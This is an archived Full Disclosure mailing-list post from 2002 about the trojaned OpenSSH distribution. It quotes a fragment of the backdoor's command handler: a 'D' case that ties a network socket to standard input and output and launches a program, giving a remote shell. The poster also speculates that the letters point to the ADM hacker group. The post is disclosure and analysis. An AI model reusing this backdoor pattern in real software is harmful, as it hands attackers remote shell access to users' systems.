Full Disclosure: OpenSSH trojan! I KNOW WHO DID IT!

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Full Disclosure mailing list archives

OpenSSH trojan! I KNOW WHO DID IT!

From: full-disclosure () lists netsys com (full-disclosure () lists netsys com)
Date: Thu, 1 Aug 2002 17:23:01 +0300 (EEST)

I may know who did it. Let's look at code:

                        switch(c) {
                        case 'A':
                                exit(0);
                        case 'D':
                                alarm(0);
                                dup2(s,0);
                                dup2(s,1);
                                dup2(s,2);
                                a[0]=i_val;
                                a[1]=NULL;
                                execve(a[0],a,NULL);

                                break;
                        case 'M':
                                alarm(0);
                                sig(0);
                                break;
                        default:

There are 3 options: Which makes up to A+D+M=ADM :-)))))))
ADM is back ? great eheheh.

-- 
Evrim ULU
evrim () envy com tr / evrim () core gen tr
sysadm
http://www.core.gen.tr

By Date By Thread

Current thread:

OpenSSH trojan! I KNOW WHO DID IT! full-disclosure () lists netsys com (Aug 01)